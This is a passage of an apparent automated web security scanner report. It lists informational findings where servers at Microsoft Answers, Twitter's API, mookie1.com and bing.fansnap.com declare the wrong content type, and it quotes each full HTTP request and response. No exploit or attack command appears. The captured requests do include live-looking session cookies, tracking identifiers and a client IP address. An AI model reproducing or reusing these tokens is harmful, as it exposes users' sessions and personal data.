document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3449391312096071132"/>');

29.4. http://answers.microsoft.com/en-us/Site/SetTimeZoneOffset  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://answers.microsoft.com
Path:   /en-us/Site/SetTimeZoneOffset

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /en-us/Site/SetTimeZoneOffset HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us
Content-Length: 12
Origin: http://answers.microsoft.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

tzOffset=300

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: tzo=300; domain=answers.microsoft.com; expires=Thu, 18-Aug-2011 15:28:35 GMT; path=/
Date: Tue, 19 Jul 2011 15:28:34 GMT
Content-Length: 1

1

29.5. http://answers.microsoft.com/en-us/site/resources  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://answers.microsoft.com
Path:   /en-us/site/resources

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /en-us/site/resources HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:28:17 GMT
Content-Length: 14849


if (typeof(Answers) == "undefined")
Answers = {};

Answers.Res = {
SiteReadOnlyMsg:'We\u2019re sorry\x21 The Answers site is temporarily in read-only mode and we cannot proceed with th
...[SNIP]...

29.6. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/statuses/user_timeline.json?screen_name=majornelson&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=10&since_id=93451027130486785&refresh=true&clientsource=TWITTERINC_WIDGET&1311118946276=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://majornelson.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A130884465537011414; k=173.193.214.243.1311018175028268; __utma=43838368.1598605414.1305368954.1311018185.1311089296.18; __utmz=43838368.1311089296.18.11.utmcsr=microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/systemcenter/en/us/try-it.aspx; __utmv=43838368.lang%3A%20en; original_referer=OTZIBTkFw3v2qtbTzneP5MlIz9cQBF6V; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGlPx0QxAToHaWQiJWRmOGVjZTMxZDMyZGQ4%250ANDY2ZGFjMDQ4NGFiODljM2I1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--51cee242652b2fbff232eb217ef719443c54f96d

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:43:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1311119019-44874-63027
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 19 Jul 2011 23:43:39 GMT
X-RateLimit-Remaining: 145
X-Runtime: 0.03172
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114ac0fc3df
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: a31a21497a04d3e098dd481ef7efb944e773d8c5
X-RateLimit-Reset: 1311122537
Vary: Accept-Encoding
Content-Length: 34
Connection: close

TWTR.Widget.receiveCallback_1([]);

29.7. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/minorcat/1/11408426983@x02

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /2/ticketmaster/minorcat/1/11408426983@x02? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE; expires=Fri, 19-Jul-13 18:36:05 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 9
Content-Type: text/html

<!-- -->

29.8. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /2/zzzSample/wwww.themig.com/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13
Content-Type: text/html

<!-- DATA -->

29.9. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /2/zzzSample/wwww.themig.com/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13
Content-Type: text/html

<!-- DATA -->

29.10. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1@x96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /2/zzzSample/wwww.themig.com/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13
Content-Type: text/html

<!-- DATA -->

29.11. http://b3.mookie1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100967

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:12:32 GMT
ETag: "a10220-1cee-48821a2b65800"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

29.12. http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /ejs_templates/seats_page/known_tooltip.ejs

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /ejs_templates/seats_page/known_tooltip.ejs?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B2dJOHBjoLb2Zmc2V0af6QnQ%3D%3D--8a1ac49a36095f4dbcf7a97d829c4d094b2f91ed

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Sep 2010 17:59:33 GMT
ETag: "27341ca-2e1-dbd2eb40"
Accept-Ranges: bytes
Content-Length: 737
Connection: close
Content-Type: text/plain; charset=UTF-8

<div class="vfs-tooltip">
<div class="vfs-tooltip-img">
<% switch(format) {
case 'none':
var src = '/images/rollover-no-vfs.png';
break;
case
...[SNIP]...

29.13. http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B9mjiKBjoLb2Zmc2V0af6QnQ%3D%3D--406bc3695b0c3407dbc0a7c3d9f043fb02bee7a5

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Jan 2011 00:52:57 GMT
ETag: "9d01e4-1dd-b07bec40"
Accept-Ranges: bytes
Content-Length: 477
Connection: close
Content-Type: text/plain; charset=UTF-8

<div class="ugc-sec-photo">
<% if (uploadEnabled) { %>
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<%= catId %>&seating_detail[section]=<%= escapedSection %>&seatin
...[SNIP]...

29.14. http://bing.fansnap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BMHIGNBjoLb2Zmc2V0af6QnQ%3D%3D--256c58ea27767e4ae2c12bff9fafdb074d0ff1ca

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Sep 2008 05:44:59 GMT
ETag: "9d09aa-1536-563d8cc0"
Accept-Ranges: bytes
Content-Length: 5430
Connection: close
Content-Type: text/plain; charset=UTF-8

...... .... .....&......... .h.......(... ...@..... .................................%.,.C.J.C.J.C.J.C.J.C.J.A.G.".(...................................................................................
...[SNIP]...

29.15. http://bing.fansnap.com/seats/ajax/get_vfs_data  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /seats/ajax/get_vfs_data

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /seats/ajax/get_vfs_data?vid=6119&ch=bing&cat=21600 HTTP/1.1
